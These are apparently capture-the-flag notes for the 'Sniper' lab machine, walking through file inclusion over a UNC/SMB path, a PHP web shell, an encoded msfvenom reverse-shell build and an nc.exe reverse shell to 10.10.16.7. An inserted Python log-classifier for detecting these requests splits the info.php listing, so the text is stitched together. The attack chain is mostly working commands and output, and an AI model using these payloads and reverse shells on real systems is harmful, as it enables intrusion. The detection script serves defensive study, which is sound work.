4 :80 /blog > LFI > smbRFI
http://sniper.htb/blog/?lang=blog-fr.php
# maybe LFI / RFI?
# tested using http://sniper.htb/blog/index.php?lang=header.html
| a relative path to reach ..\user\db.php returns an error,
| do we need an absolute path?
Trying C:\Windows\System32\Drivers\etc\hosts
| as it's running PHP
view-source:http://sniper.htb/blog/index.php?lang=/Windows/win.ini
| shows file
</html>
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
</body>
</html>
# RFI fails
http://sniper.htb/blog/index.php?lang=http://10.10.16.7/kashz
# no callback
# trying an SMB share read instead, since a UNC path is opened as a file on the network rather than through a URL wrapper
http://sniper.htb/blog/index.php?lang=//10.10.16.7/kashz
$ smbserver.py -smb2support drive .
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49765)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found KASHZ
[-] SMB2_TREE_CONNECT not found KASHZ
# we get a callback
# testing a simple info.php
$ cat info.php
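As an added detection example (not part of the original notes): every lang= value tried above leaves a distinct trail in the IIS access log, and the UNC variant is the one a plain "http://" RFI signature misses. The script parses a constructed W3C-format excerpt replaying those requests and labels each value; the allowlist, field subset and timestamps are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote
# Constructed IIS W3C log excerpt (timestamps/fields assumed) replaying the lang= values tried above.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2021-09-17 10:00:01 10.10.10.151 GET /blog/index.php lang=blog-fr.php 80 10.10.16.7 200
2021-09-17 10:00:05 10.10.10.151 GET /blog/index.php lang=..\user\db.php 80 10.10.16.7 200
2021-09-17 10:00:09 10.10.10.151 GET /blog/index.php lang=/Windows/win.ini 80 10.10.16.7 200
2021-09-17 10:00:14 10.10.10.151 GET /blog/index.php lang=http://10.10.16.7/kashz 80 10.10.16.7 200
2021-09-17 10:00:20 10.10.10.151 GET /blog/index.php lang=//10.10.16.7/drive/web.php 80 10.10.16.7 200
2021-09-17 10:00:25 10.10.10.151 GET /blog/index.php lang=%5C%5C10.10.16.7%5Cdrive%5Cweb.php 80 10.10.16.7 200
"""
ALLOWED_LANG_FILES = {"blog-en.php", "blog-fr.php"}  # assumed allowlist of real language files

def classify_lang(value: str) -> str:
    """Label one lang= value; anything but 'ok' is an attempt to abuse the include sink."""
    v = unquote(unquote(value)).strip()  # decode twice so %255C-style double encoding is caught
    if v in ALLOWED_LANG_FILES:
        return "ok"
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return "url_or_wrapper"  # scheme-based: http://, php://filter, data://
    if v.startswith(("//", "\\\\")):
        return "unc_rfi"  # UNC path: PHP on Windows opens it as a file over SMB, no URL wrapper involved
    if ".." in v:
        return "traversal"
    if v.startswith(("/", "\\")) or re.match(r"^[a-zA-Z]:", v):
        return "absolute_path"
    return "unknown"

def parse_w3c(text: str):
    """Yield one dict per record, keyed by the names from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_include_abuse(text: str):
    """Return (client ip, uri stem, raw lang value, verdict) for each suspicious request."""
    hits = []
    for rec in parse_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        for value in parse_qs(query, keep_blank_values=True).get("lang", []):
            verdict = classify_lang(value)
            if verdict != "ok":
                hits.append((rec["c-ip"], rec["cs-uri-stem"], value, verdict))
    return hits
```

On the sample log the legitimate blog-fr.php request is the only one left unflagged; the percent-encoded backslash form is caught because the query is decoded before classification.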
<?php
phpinfo();
?>
http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/info.php
| we get the phpinfo output
System Windows NT SNIPER 10.0 build 17763 (Windows Server 2016) i586
Architecture x86
Loaded Configuration File C:\Program Files (x86)\PHP\v7.3\php.ini
disable_functions no value
$_SERVER['USERDOMAIN'] WORKGROUP
$_SERVER['USERNAME'] SNIPER$
$_SERVER['SCRIPT_FILENAME'] C:\inetpub\wwwroot\blog\index.php
# disable_functions is empty, so we can execute commands
# next, web.php (a command web shell) served from the same share
http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/web.php
CMD: whoami && whoami /priv && systeminfo
nt authority\iusr
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
Host Name: SNIPER
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hotfix(s): N/A
# no write permissions on C:\inetpub\wwwroot\blog or C:\users\public\
# tried running a nishang shell, but PS does not seem to run it?
# tried copying an msfvenom payload to C:\windows\temp
| Operation did not complete successfully because the file contains a virus or potentially unwanted software.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=445 -f exe -o kashz.exe -e "x86/shikata_ga_nai"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 487 (iteration=0)
x86/shikata_ga_nai chosen with final size 487
Payload size: 487 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe
CMD: copy \\10.10.16.7\drive\kashz.exe C:\windows\temp\kashz.exe
1 file(s) copied.
# the shell won't execute; tried ports 445 and 49667, no callback
# via nc.exe
copy \\10.10.16.7\drive\nc.exe C:\windows\temp\nc.exe
C:\windows\temp\nc.exe -e C:\Windows\System32\cmd.exe 10.10.16.7 6969
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.151] 49831
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\blog>